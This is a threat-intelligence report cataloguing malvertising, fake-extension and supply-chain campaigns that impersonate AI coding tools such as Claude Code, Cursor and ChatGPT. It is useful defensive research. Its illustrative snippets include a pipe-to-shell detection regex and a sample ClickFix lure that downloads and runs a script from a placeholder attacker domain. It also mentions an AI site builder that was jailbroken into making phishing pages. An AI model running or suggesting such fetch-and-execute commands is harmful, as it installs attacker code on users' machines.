AI Coding Tools Under Fire: Mapping the Malvertising Campaigns Targeting the Vibe Coding Ecosystem

By Eilon Cohen

March 10, 2026

Executive Summary

Between February 2025 and March 2026, at least 20 distinct malware campaigns specifically targeted AI and vibe coding tools. The targets span the full stack of the AI developer ecosystem: code editors (Cursor, Claude Code), AI agents (OpenClaw), LLM platforms (ChatGPT, DeepSeek, Grok), AI-powered browser extensions, AI video generators (Luma AI, Kling AI), and AI business tools (NovaLeads AI, InVideo AI).

This report catalogs every publicly documented campaign, maps the attack vectors, and identifies which tools have been hit and which are likely to be targeted next.

The research builds on our deep-dive analysis, "InstallFix: Fake Claude Code Pages Deliver Amatera Stealer via Google Ads" [16], which documented one of the most sophisticated campaigns in this dataset: a pixel-perfect Squarespace replica of Anthropic's official documentation, promoted through Google Ads, delivering the Amatera Stealer through an obfuscated multi-stage payload chain. That campaign, cataloged here as #18, exemplifies the attack patterns now proliferating across the ecosystem.

Attack Vector Analysis

The campaigns cluster into five distinct attack vectors, each exploiting a different trust boundary.

1. Search Engine Malvertising (7 campaigns)

Seven campaigns used paid search ads or search engine poisoning. The technique is straightforward: buy an ad for "install [AI tool]" and serve a convincing clone. The InstallFix campaign targeting Claude Code is the most sophisticated example, using a pixel-perfect Squarespace replica of Anthropic's official documentation.

The OpenClaw campaign introduced a new variant: simply hosting fake repos on GitHub was enough to get them promoted by Bing's AI-generated search results. No ad purchase was needed. As Huntress noted, "just hosting the malware on GitHub was enough to poison Bing AI search results." [17] This is a significant escalation because it means AI-powered search is now an attack surface itself.

2. Trusted Domain Abuse (3 campaigns)

Three campaigns exploited user-generated content on the AI platforms' own domains. The ChatGPT shared-chat attack (Kaspersky, December 2025) is particularly clever: attackers create a public ChatGPT conversation containing a fake "Atlas browser" installation guide with a ClickFix terminal command. The link leads to chatgpt.com/share/..., which is OpenAI's legitimate domain. The AdGuard-reported campaign (February 2026) does the same thing with claude.ai artifacts, creating fake Homebrew install guides on Anthropic's own domain and buying Google Ads to promote them.

The trust chain is devastating: Google Ad → official AI platform domain → user-generated malicious content. The victim never leaves a "trusted" site.
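The failure mode is easy to demonstrate: any check that trusts an entire hostname treats an attacker-created share link and the official homepage identically. A minimal sketch in Python, using illustrative URLs (the share path below is invented, not a real campaign indicator):

```python
from urllib.parse import urlparse

# A naive filter that trusts entire hostnames -- the mental shortcut
# (and ad-review heuristic) these campaigns exploit.
TRUSTED_HOSTS = {"chatgpt.com", "claude.ai"}

def is_trusted(url: str) -> bool:
    return urlparse(url).hostname in TRUSTED_HOSTS

official = "https://chatgpt.com/"
ugc_share = "https://chatgpt.com/share/abc123"  # hypothetical attacker-created share link

print(is_trusted(official))   # True
print(is_trusted(ugc_share))  # True -- same host, but attacker-controlled content
```

The hostname carries no information about who authored the content behind a given path, which is exactly the gap UGC-abuse campaigns occupy.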

3. Extension/Plugin Marketplace Poisoning (6 campaigns)

Six campaigns targeted browser extension or IDE extension marketplaces. The scale is staggering: the Microsoft-reported campaign alone reached 900,000 installs across 20,000+ enterprise tenants. The AiFrame campaign hit 260,000 users. The VS Code AI extension campaign reached 1.5 million downloads.

Extension marketplaces are the weakest link. Review processes are insufficient, and users have been trained to install extensions casually. The Cursor $500K theft started with a single malicious VS Code extension.

4. Fake Download Sites (5 campaigns)

Five campaigns used standalone fake websites distributed through SEO manipulation or social media advertising. The UNC6032 campaign (Mandiant/Google) ran thousands of ads on Facebook and LinkedIn for fake versions of Luma AI, Canva Dream Lab, and Kling AI, reaching 2.3 million users in the EU alone. The DeepSeek campaigns used both Google Ads and standalone phishing sites with fake CAPTCHA pages.

5. Supply Chain Attacks (1 campaign)

One confirmed campaign targeted the npm registry with malicious packages impersonating Cursor IDE tools for macOS. This vector is particularly dangerous because developers install packages programmatically, often without manual review.
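The report does not name the malicious packages, so the names below are hypothetical, but the impersonation pattern can be sketched with the kind of simple name-similarity check registry scanners use:

```python
import difflib

# Hypothetical legitimate package names -- not actual campaign indicators.
LEGITIMATE = ["cursor", "cursor-cli"]

def looks_like_typosquat(name: str, threshold: float = 0.8) -> bool:
    """Flag names suspiciously similar (but not identical) to known packages."""
    for legit in LEGITIMATE:
        ratio = difflib.SequenceMatcher(None, name, legit).ratio()
        if name != legit and ratio >= threshold:
            return True
    return False

print(looks_like_typosquat("cursor"))    # False -- exact match is the real package
print(looks_like_typosquat("cursror"))   # True -- suspicious near-miss
print(looks_like_typosquat("left-pad"))  # False -- unrelated name
```

Checks like this catch near-miss typosquats, but not impersonation via plausible-sounding companion names ("cursor-tools", "cursor-helper"), which is why programmatic installs remain risky.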

Which AI Tools Are Being Targeted?

Not all AI tools face equal risk. The following breakdown shows which tools have been hit, how many times, and through what vectors.

| AI Tool | # of Campaigns | Attack Vectors Used | Malware Families |
| --- | --- | --- | --- |
| ChatGPT / OpenAI | 5 | Fake installer, UGC abuse (shared chats), fake Chrome extensions (x3) | Lucky_Gh0$t, AMOS, data harvesters |
| Cursor IDE | 3 | Google Ads clone, fake VS Code extension, npm supply chain | Infostealers, RAT, backdoor |
| DeepSeek | 3 | Google Ads, fake CAPTCHA sites, fake Chrome extensions | Various stealers, data harvesters |
| Claude / Claude Code | 2 | Google Ads → Squarespace clone (InstallFix), Google Ads → claude.ai UGC | Amatera Stealer, botnet dropper |
| Grok AI | 2 | Fake macOS app, fake Chrome extensions | SimpleStealth, data harvesters |
| OpenClaw | 1 | Fake GitHub repos (Bing AI poisoned) | AMOS, Vidar, GhostSocks |
| Luma AI | 1 | Facebook/LinkedIn Ads → fake AI video sites | STARKVEIL → XWORM, FROSTRIFT |
| Kling AI | 1 | Facebook/LinkedIn Ads → fake AI video sites | STARKVEIL → XWORM, FROSTRIFT |
| Canva Dream Lab | 1 | Facebook/LinkedIn Ads → fake AI video sites | STARKVEIL → XWORM, FROSTRIFT |
| InVideo AI | 1 | SEO poisoning → fake installer | Numero (destructive) |
| NovaLeads AI | 1 | SEO poisoning → fake site | CyberLock ransomware |
| Lovable | 1 | Abused to create phishing (not impersonated) | N/A |
| VS Code AI extensions | 1 | Fake Marketplace extensions | Infostealers |
| Gemini | 1 | Fake Chrome extensions (AiFrame) | Data stealer |

ChatGPT is the most targeted AI tool by a wide margin, appearing in five separate campaigns. This makes sense: it has the largest user base and the strongest brand recognition, making it the most effective lure. Cursor IDE is the most targeted AI code editor with three distinct campaigns across three different vectors (ads, extensions, npm), demonstrating that attackers probe every possible entry point.

The Full Campaign Matrix

Every confirmed campaign targeting an AI tool, ordered by date of public disclosure.

| # | Date | AI Tool Targeted | Attack Vector | Malware | Platform | Scale | Source |
| --- | --- | --- | --- | --- | --- | --- | --- |
| 1 | Feb 2025 | DeepSeek | Fake sites with CAPTCHA ClickFix | Various stealers | Windows | Multiple domains | Zscaler [1] |
| 2 | Feb 2025 | NovaLeads AI | SEO poisoning → fake AI tool site | CyberLock ransomware | Windows | Single domain | Cisco Talos [2] |
| 3 | Mar 2025 | DeepSeek | Google Ads → fake download pages | Infostealers | Cross-platform | Active ad campaign | Malwarebytes [3] |
| 4 | Mar 2025 | DeepSeek, Grok | Phishing sites mimicking homepages | Stealers, backdoors, PowerShell scripts | Cross-platform | Multiple domains | Kaspersky [4] |
| 5 | Apr 2025 | Lovable (abused) | Jailbroken to create phishing sites | N/A (tool is the weapon) | Web | Benchmark test | Guardio Labs [5] |
| 6 | May 2025 | Cursor IDE | Malicious npm packages | Backdoor | macOS | 3,200+ infections | The Hacker News [6] |
| 7 | May 2025 | ChatGPT | Fake "ChatGPT 4.0 Premium" installer | Lucky_Gh0$t ransomware | Windows | Telegram/social distribution | Cisco Talos [2] |
| 8 | May 2025 | InVideo AI | SEO poisoning → fake installer | Numero (destructive) | Windows | Single campaign | Cisco Talos [2] |
| 9 | May 2025 | Luma AI, Canva Dream Lab, Kling AI | Facebook/LinkedIn Ads → fake AI video sites | STARKVEIL → XWORM, FROSTRIFT | Windows | 2.3M+ EU reach, 30+ sites | Mandiant/Google [7] |
| 10 | Jul 2025 | Cursor IDE | Fake VS Code extension | RAT + infostealer | Cross-platform | $500K crypto theft | BleepingComputer [8] |
| 11 | Sep 2025 | Cursor IDE | Google Ads → cloned cursor.com | Infostealers | Cross-platform | Active ad campaign | ImpersonAlly [9] |
| 12 | Dec 2025 | ChatGPT | Google Ads → chatgpt.com shared chats (UGC) → ClickFix | AMOS + backdoor | macOS | Active campaign | Kaspersky [10] |
| 13 | Jan 2026 | Grok AI | Fake macOS app website | SimpleStealth | macOS | Single campaign | Mosyle [11] |
| 14 | Jan 2026 | VS Code AI assistants | Fake extensions on Marketplace | Infostealers | Cross-platform | 1.5M+ downloads | The Hacker News [12] |
| 15 | Feb 2026 | Claude (claude.ai artifacts) | Google Ads → claude.ai UGC with fake brew commands | Botnet dropper | macOS | Ads active for weeks | AdGuard [13] |
| 16 | Feb 2026 | ChatGPT, Claude, Gemini, Grok | Fake Chrome AI assistant extensions (AiFrame) | iframe-injecting data stealer | Cross-platform | 260,000+ installs | LayerX [14] |
| 17 | Feb 2026 | ChatGPT, AI assistants | 30 fake AI Chrome extensions | Password/data stealer | Cross-platform | 300,000+ users | PCWorld [15] |
| 18 | Mar 2026 | Claude Code | Google Ads → Squarespace clone docs → InstallFix | Amatera Stealer | macOS | Multiple domains, ACTIVE | Pillar Research [16] |
| 19 | Mar 2026 | OpenClaw AI agent | Fake GitHub repos → Bing AI search poisoning | AMOS, Vidar, GhostSocks | macOS + Windows | Multiple repos | Huntress [17] |
| 20 | Mar 2026 | ChatGPT, DeepSeek | Fake AI assistant browser extensions | LLM chat history harvester | Cross-platform | 900,000 installs, 20K+ enterprises | Microsoft [18] |

Platform Targeting: macOS Dominance

Of the 20 campaigns, the platform targeting breaks down as follows:

| Target Platform | # of Campaigns | Notable Examples |
| --- | --- | --- |
| Cross-platform | 9 | Browser extensions, fake download sites |
| macOS exclusively | 7 | Claude Code, Cursor npm, ChatGPT ClickFix, Grok, Claude.ai artifacts, OpenClaw |
| Windows exclusively | 4 | ChatGPT installer, InVideo AI, NovaLeads AI, DeepSeek CAPTCHA |

macOS is disproportionately targeted relative to its market share. Seven campaigns target macOS exclusively, and the cross-platform campaigns also include macOS payloads. The reason is clear: AI/vibe coding tool users skew heavily toward macOS, and macOS users tend to have higher-value credentials (SSH keys, cloud tokens, cryptocurrency wallets).

The ClickFix/InstallFix technique (tricking users into pasting commands into Terminal) is uniquely effective against developers because curl | sh is a legitimate installation pattern. Homebrew, Rust, nvm, and many other developer tools use this exact pattern. The malicious commands hide in plain sight.
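A rough sketch of why this works: any pattern-based filter that flags "download a script and pipe it into a shell" catches the legitimate Homebrew installer and a ClickFix lure equally. The second URL below is invented for illustration:

```python
import re

# The shape shared by legitimate installers and ClickFix lures alike:
# pipe curl output into a shell, or run a shell on a curl substitution.
PIPE_TO_SHELL = re.compile(r"curl\s+.*\|\s*(bash|sh)\b|bash\s+-c\s+[\"']\$\(curl")

commands = [
    # Real Homebrew install command (from brew.sh):
    '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"',
    # Hypothetical ClickFix lure -- identical shape, attacker-controlled host:
    '/bin/bash -c "$(curl -fsSL https://fake-install.example/fix.sh)"',
]

for cmd in commands:
    print(bool(PIPE_TO_SHELL.search(cmd)))  # True for both: indistinguishable by shape
```

The only reliable signal is the download URL itself, which is exactly what the clone pages and cloaked ads are built to disguise.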

Malware Arsenal

The campaigns deploy at least 13 distinct malware families, ranging from infostealers to ransomware to destructive malware.

| Malware Family | Type | Platform | Campaigns | Key Capability |
| --- | --- | --- | --- | --- |
| AMOS (Atomic macOS Stealer) | Infostealer | macOS | ChatGPT ClickFix, OpenClaw | Keychain, browser data, crypto wallets, file exfil |
| Amatera Stealer | Infostealer | macOS | Claude Code InstallFix | Browser creds, cookies, crypto. Blockchain-based C2. |
| SimpleStealth | Infostealer | macOS | Fake Grok app | Credential theft, system info |
| Vidar | Infostealer | Windows | OpenClaw | Browser data, crypto. C2 via Telegram/Steam. |
| GhostSocks | Proxy malware | Windows | OpenClaw | Converts victim into proxy node for fraud |
| STARKVEIL | Dropper | Windows | UNC6032 (Luma AI, Kling AI) | Drops XWORM, FROSTRIFT, GRIMPULL |
| XWORM | RAT/Backdoor | Windows | UNC6032 | Full remote access, C2 via Telegram |
| FROSTRIFT | Backdoor | Windows | UNC6032 | Persistent access, Tor-based C2 |
| Lucky_Gh0$t | Ransomware | Windows | Fake ChatGPT installer | AES-256 + RSA-2048 encryption |
| CyberLock | Ransomware | Windows | Fake NovaLeads AI | PowerShell-based, $50K Monero ransom |
| Numero | Destructive | Windows | Fake InVideo AI | Overwrites all GUI elements, renders OS unusable |
| LLM Chat Harvester | Data stealer | Cross-platform | Fake AI Chrome extensions | Exfils ChatGPT/DeepSeek conversations |
| AiFrame | Data stealer | Cross-platform | Fake AI Chrome extensions | iframe injection, credential theft |

The diversity is notable. Attackers are not deploying cookie-cutter stealers; they are tailoring payloads to the target demographic. Developers get infostealers (credentials, crypto). Business users get ransomware. The Numero malware is purely destructive, suggesting some campaigns are motivated by disruption rather than profit.

The Acceleration Curve

Plotting the campaigns by quarter reveals a clear acceleration:

| Period | # of Campaigns | Key Events |
| --- | --- | --- |
| Q1 2025 (Jan-Mar) | 4 | DeepSeek hype wave exploited immediately |
| Q2 2025 (Apr-Jun) | 5 | Cursor npm attack, Talos fake AI installers, UNC6032 |
| Q3 2025 (Jul-Sep) | 2 | Cursor VS Code extension ($500K theft), Cursor Google Ads clone |
| Q4 2025 (Oct-Dec) | 1 | ChatGPT ClickFix via shared chats |
| Q1 2026 (Jan-Mar, partial) | 8 | Claude Code, OpenClaw, fake extensions (900K+), AiFrame, Grok |

The first 10 weeks of 2026 have already produced as many campaigns as the final three quarters of 2025 combined. The trend is unmistakable: as vibe coding tools go mainstream, the attack surface expands proportionally. Every new tool that gains traction becomes a target within weeks.

Tools Not Yet Targeted (But at Risk)

The following popular AI coding tools have no publicly documented impersonation or malvertising campaigns. Based on the patterns observed, they are at elevated risk.

| Tool | Why It's at Risk |
| --- | --- |
| Windsurf (Codeium) | Rapidly growing AI code editor, terminal-based install, macOS-heavy userbase. Shares VS Code extension architecture with Cursor (already targeted 3x). |
| GitHub Copilot | Largest AI coding assistant by market share. Vulnerabilities found (CamoLeak, prompt injection) but no impersonation campaign yet. The brand recognition makes it a high-value lure. |
| Bolt.new | Trending vibe coding tool, browser-based but has CLI components. High search volume from non-technical users (ideal ClickFix targets). |
| Replit | Massive userbase including beginners. Already abused as a hosting platform for phishing. The tool itself has not been impersonated yet. |
| v0 (Vercel) | Developer-focused, npm-based install. Growing search volume. |
| Devin | Extremely hyped "AI software engineer." Users actively searching for access/install instructions. |
| Aider | CLI tool with pip install pattern. Growing rapidly in the open-source community. |
| Continue.dev | VS Code extension for AI coding. Same marketplace attack surface as Cursor. |

The InstallFix technique (cloning official docs and replacing install commands) is trivially adaptable to any tool that uses curl | sh, npm install, or pip install as its primary installation method. Every tool on this list fits that profile.

The Bigger Picture

Three structural factors make this problem worse, not better:

First, AI search is now an attack surface. The OpenClaw campaign proved that simply hosting malicious content on GitHub is enough to get it promoted by Bing's AI search. As more users rely on AI-generated search summaries rather than manually evaluating URLs, the barrier to successful social engineering drops further.

Second, trusted domains are being weaponized. The ChatGPT shared-chat and claude.ai artifact attacks exploit the fact that AI platforms allow user-generated content on their own domains. When a Google Ad leads to chatgpt.com, even security-conscious users may lower their guard. This is a fundamental design tension: the same features that make AI tools useful (sharing, collaboration, public artifacts) create attack surface.

Third, the cloaking infrastructure is mature. Platforms like 1Campaign (exposed by Varonis, February 2026) have been operational for 3+ years, enabling attackers to bypass Google's ad review with a 99.2% block rate against security scanners. [19] This means the ad review process is structurally broken for this class of attack. The attackers have industrialized their evasion.

The net result: any AI tool that gains significant search volume will be impersonated within weeks. The campaigns are cheap to run, the infrastructure is available as a service, and the targets (developers with high-value credentials) are worth the investment.

References

[1] Zscaler, "DeepSeek Lure Using CAPTCHAs To Spread Malware," February 25, 2025. https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware

[2] Cisco Talos, "Cybercriminals camouflaging threats as AI tool installers," May 29, 2025. https://blog.talosintelligence.com/fake-ai-tool-installers/

[3] Malwarebytes, "DeepSeek users targeted with fake sponsored Google ads that deliver malware," March 26, 2025. https://www.malwarebytes.com/blog/news/2025/03/deepseek-users-targeted-with-fake-sponsored-google-ads-that-deliver-malware

[4] Kaspersky/Securelist, "Backdoors and stealers prey on DeepSeek and Grok," March 6, 2025. https://securelist.com/backdoors-and-stealers-prey-on-deepseek-and-grok/115801/

[5] Guardio Labs, "VibeScamming - From Prompt to Phish," April 9, 2025. https://medium.com/@guardiosecurity/vibescamming-from-prompt-to-phish

[6] The Hacker News, "Malicious npm Packages Infect 3200+ Cursor Users With Backdoor," May 9, 2025. https://thehackernews.com/2025/05/malicious-npm-packages-infect-3200.html

[7] Mandiant/Google, "Text-to-Malware: How Cybercriminals Weaponize Fake AI-Themed Websites," May 27, 2025. https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites/

[8] BleepingComputer, "Malicious VSCode extension in Cursor IDE led to $500K crypto theft," July 14, 2025. https://www.bleepingcomputer.com/news/security/malicious-vscode-extension-in-cursor-ide-led-to-500k-crypto-theft/

[9] ImpersonAlly, "As AI Booms, Fraudsters Follow: The Case of Cursor," September 7, 2025. https://impersonally.io/as-ai-booms-fraudsters-follow-the-case-of-cursor/

[10] Kaspersky, "The AMOS infostealer is piggybacking ChatGPT's chat-sharing feature," December 9, 2025. https://www.kaspersky.com/blog/share-chatgpt-chat-clickfix-macos-amos-infostealer/54928/

[11] PhoneArena/Mosyle, "Mac users are being targeted by a fake Grok app," January 12, 2026. https://www.phonearena.com/news/mac-users-are-being-targeted-by-a-fake-grok-app-and-its-powered-by-ai_id177227

[12] The Hacker News, "Malicious VS Code AI Extensions with 1.5 Million Installs Steal Data," January 26, 2026. https://thehackernews.com/2026/01/malicious-vs-code-ai-extensions-with-15.html

[13] AdGuard, "Claude-linked Google ads dupe macOS users into installing malware," February 12, 2026. https://adguard.com/en/blog/claude-google-ads-malware-poisoning-macos.html

[14] LayerX, "AiFrame - Fake AI Assistant Extensions Targeting 260,000 Chrome Users," February 12, 2026. https://layerxsecurity.com/blog/aiframe-fake-ai-assistant-extensions-targeting-260000-chrome-users-via-injected-iframes/

[15] PCWorld, "30 fake AI Chrome extensions caught stealing passwords and more," February 17, 2026. https://www.pcworld.com/article/3063476/30-fake-ai-chrome-extensions-caught-stealing-passwords-and-more.html

[16] Pillar Research, "InstallFix: Fake Claude Code Pages Deliver Amatera Stealer via Google Ads," March 9, 2026. https://pillar.security/pillar-research/installfix

[17] BleepingComputer/Huntress, "Bing AI promoted fake OpenClaw GitHub repo pushing info-stealing malware," March 5, 2026. https://www.bleepingcomputer.com/news/security/bing-ai-promoted-fake-openclaw-github-repo-pushing-info-stealing-malware/

[18] Microsoft, "Malicious AI Assistant Extensions Harvest LLM Chat Histories," March 5, 2026. https://www.microsoft.com/en-us/security/blog/2026/03/05/malicious-ai-assistant-extensions-harvest-llm-chat-histories/

[19] Varonis, "1Campaign: A New Cloaking Platform Helping Attackers Abuse Google Ads," February 24, 2026. https://www.varonis.com/blog/1campaign
